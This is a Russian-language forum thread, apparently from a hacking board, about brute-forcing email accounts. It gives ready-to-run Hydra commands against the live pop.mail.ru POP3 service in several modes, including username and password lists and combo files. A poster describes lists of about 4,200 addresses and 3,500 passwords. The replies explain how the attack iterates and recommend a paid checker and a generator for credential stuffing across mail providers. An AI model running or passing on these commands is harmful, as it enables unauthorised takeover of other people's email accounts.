Забыл указать для текстовых файлов L и P большие: Code: hydra -S -L mail.txt -P pass.txt -t 16 pop.mail.ru pop3 маленькие если перебор логинов по одному паролю Code: hydra -S -L mail.txt -p Mystery73519! -t 16 pop.mail.ru pop3 или перебор паролей к логину Code: hydra -S -l [email protected] -P pass.txt -t 16 pop.mail.ru pop3 для списка Code: login:pass Code: hydra -S -C login_pass.txt -t 16 pop.mail.ru pop3
Последний вопрос остался, базы сделал mail.txt (тут список почты, mail,yandex,gmail и прочии) и pass.txt тут только пароли. Почты 4.2к шт, паролей 3.5к. По этим запросам как будет брут идти? (то есть все 3.5к к одному мылу или только по рядам?) и куда сохраняется результат?
Все пароли по очереди к мылу, результат в лог смотри через hydra -h, у меня годовщина свадьбы, я пьян и не некогда мне разглагольствовать, пробуй и экспериментируй, читай мануал, не понятное переводи через гугл.
купи All-in-One Checker [Private] - Чекер почтовых сервисов и чекай на здоровье стоит 500 рубасов не столько уж критично. используй программу генератор (POWERFUL GENERATOR) где склеиваешь твои имейлы + пароли и получаешь словарик где все варианты этих паролей к мыльникам. дальше засовываешь в чекер и удачи. (не все почты проверишь но все же начало есть!) --- Нет денег, в нете видел ломаных этот софт но пашет ли сейчас не знаю, почты часто меняют свои методы авторизации по этому проги и дохнут без обновки.